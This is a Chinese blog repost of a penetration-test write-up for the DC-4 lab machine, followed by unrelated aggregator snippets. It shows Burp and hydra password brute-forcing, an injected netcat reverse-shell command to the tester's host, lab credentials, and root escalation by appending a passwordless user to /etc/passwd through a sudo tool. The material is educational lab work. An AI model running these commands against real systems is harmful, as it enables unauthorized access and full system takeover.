DC4靶机渗透测试报告

news/2024/11/15 18:49:04/文章来源:https://www.cnblogs.com/cll-wlaq/p/18306867

概述

测试目的

测试范围

序号

系统

IP

1

本地

192.168.152.128

2

靶机DC4

192.168.152.134

详细测试流程

1、发现测试目标

2、信息收集

开放了22端口和80端口

访问80端口,发现没什么可用的,就用BP暴力破解

最后得到密码是happy

登录

3、漏洞利用

登录以后可以看到有执行命令的单选框,这个时候我们选择第一个列出当前目录的文件,然后在BP里面查看相应的数据包,可以看到在radio参数里面就是执行的命令,然后用加号替换空格

先将这个数据包发送到repeater可以按下ctrl+r

然后我们将radio参数里面的命令进行替换,换成

nc+192.168.152.128+1234+-e+/bin/sh

在发包之前先在kali上面执行nc –lvnp 1234

192.168.152.128是kali的ip地址,1234是开放监听的端口

获得一个shell

用python稳定化shell,获得交互式shell

我们先回到家目录发现有三个用户,以及在jim目录下面发现有一个密码字典

保存下来用户名和密码

用hydra暴力破解

hydra –L user.txt –P pass.txt 192.168.152.134 ssh

jim/jibril04

仔细看,在登录以后提示有新邮件

输入mail命令

进入到邮件对应的目录并打开邮件

得到了carles的密码^xHhA&hvim0y

carles/^xHhA&hvim0y

Linux里面mail邮件的用法https://blog.csdn.net/weixin_34765773/article/details/116642547

4、提权

在jim用户里面用sudo和suid提权都失败

但是在charles用户里面用sudo –l发现有个以root权限运行的命令

查看/etc/passwd文件,直接追加内容添加一个具有root权限的用户

添加了一个admin用户,密码为空

echo "admin::0:0:admin:/root:/bin/bash" | sudo teehee -a /etc/passwd

添加了一个无密码的具有root权限的用户admin

这里我尝试了在jim和charles里面用su命令切换到admin都失败了,后面还试过添加其他用户,发现用su命令都不可以切换

后面想着试一下用添加的用户直接登录靶机,发现直接就成功了,并且具有root权限

漏洞详情和修复建议

漏洞风险

High

漏洞描述

对登录没有次数限制,可以爆破密码

漏洞修复

限制登录次数,加强口令强度

测试结果综述

访问80端口,利用BP暴力破解账号密码,进入以后修改执行命令请求包,反弹shell,利用python获得交互shell。找到3个账号和一个密码字典,利用hydra破解得到jim的密码。

然后ssh连接jim发现有邮件,在邮件里面发现了charles的密码,连接上了以后分别在jim和charles上面尝试了sudo和suid提权,都失败。最后在charles发现有一个具有root权限的命令,利用这个命令,添加上具有root权限的用户admin.最后在靶机上直接登录成功。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/745129.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

DC5靶机渗透测试报告

概述测试目的测试范围序号系统IP1本机192.168.152.1282DC5靶机192.168.152.136详细测试流程1、发现测试目标2、信息收集3、漏洞利用访问80端口,这个页面我什么都没有发现,目录扫描好像也没什么用没办法,看一下大佬的WPVulnHub靶机 DC-5 打靶 渗透测试详细过程_dc-5主机渗透试…

连通性相关

连通性相关 强连通分量 强连通分量(SCC):极大的强连通子图。 Tarjan 算法 维护一个栈存储搜索到的还未确定强连通分量的点,定义:\(dfn_u\) :节点 \(u\) 被搜索的次序。 \(low_u\) :\(u\) 子树中能回溯到的最小的 \(dfn\) 。不难得到:一个点子树内的 \(dfn\) 大于该点的…

DC1主机渗透测试报告

概述测试目的通过模拟黑客的渗透测试,评估目标系统是否存在可以被攻击者真实利用的漏洞以及由此引起的风险大小,为制定相应的安全措施与解决方案提供实际的依据。分析客户WEB应用系统的安全现状,检测WEB应用系统的漏洞和安全问题,并验证其他已知的脆弱点。对系统的任何弱点…

ruoyi-flow 是一个轻量、灵活的工作流引擎, 真正的国产工作流引擎 (非BPM)。 其特点简洁轻量、独立组件、易扩展、易集成,且还拥有一个简洁美观的流程设计器。

ruoyi-flow 项目概述 项目介绍 ruoyi-flow 是一个轻量、灵活的工作流引擎, 真正的国产工作流引擎 (非BPM)。 其特点简洁轻量、独立组件、易扩展、易集成,且还拥有一个简洁美观的流程设计器。 项目背景 开源的流程引擎也好状态机引擎也好不可谓不多,他们的优点是功能很完备…

C#写个简单的windows服务+部署

部署: cd C:\Windows\Microsoft.NET\Framework\v4.0.30319 InstallUtil.exe C:\Users\Administrator\source\repos\WindowsService1\WindowsService1\bin\Debug\WindowsService1.exe 启动 停止 日志: 😘宝子:除非不再醒来,除非太阳不再升起,不然都请你好好生活,挣扎着…

laravel11:发生异常时返回json

一,未配置前laravel11直接render页面 如图:二,配置 1, bootstrap/app.php <?phpuse Illuminate\Http\Request; use Illuminate\Auth\AuthenticationException; use Illuminate\Database\Eloquent\ModelNotFoundException; use Illuminate\Foundation\Application; use I…

W外链创建小红书私信卡片教程

在当今的社交媒体时代,小红书以其独特的社区属性和用户粘性,成为了许多品牌和个人展示自己、推广产品的重要平台。而在小红书上,一张精美且富有吸引力的卡片往往能够迅速吸引用户的注意,提高点击率和转化率。本文将详细介绍如何使用W外链来创建小红书卡片,帮助你在小红书上…

kettle从入门到精通 第七十六课 ETL之kettle kettle连接hive教程

1、群里有小伙伴询问kettle连接hive的demo,今天抽点时间整理下。其实kettle连接hive和连接mysql数据库也是一样的。 1)kettle中的lib目录下放hive驱动jar,这里我使用的是kyuubi-hive-jdbc-shaded-1.9.0.jar。 2)设置hive连接参数。 3)通过表输入进行读取数据。 2、下载kyu…

火山引擎ByteHouse发布高性能全文检索引擎

作为一款定位为OLAP的分析型数据库,ByteHouse在支持结构化数据检索方面具备先天优势,而此次发布的全文检索引擎则补齐了对非结构化、半结构化等数据的快速检索能力,让用户可以构建一体化的数据管理、查询服务,降低运维成本和资源成本。更多技术交流、求职机会,欢迎关注字节…

Swift实现自定义Emoji、自定义表情、自定义键盘

实现自定义表情键盘效果如下demo 参考自PPStickerKeyboard

外卖霸王餐系统,霸王餐API接口,美团/饿了么全国200+城市

微客云免费提供外卖霸王餐系统,支持分站、运营商、商家后台、独立域名,自定义品牌,自主收款。 随着科技的快速发展,数字化和网络化已经渗透到我们生活的方方面面。在餐饮行业中,API(应用程序编程接口)接口的广泛应用不仅提升了餐厅的运营效率,也为消费者带来了更加便捷…

2024牛客暑期多校训练营1 I.Mirror Maze(题解)

2024牛客暑期多校训练营1 I.Mirror Maze(题解),大模拟题意 给一个 \(n \times m\) 的二维char数组,由4种镜子组成,\, /, -, |,镜面反射规则就是根据光线的方向和镜面的角度符合直觉的反射,然后有多组询问 \(q \leq 10^6\),每次给定起始位置和光线方向,求该光会经过多少…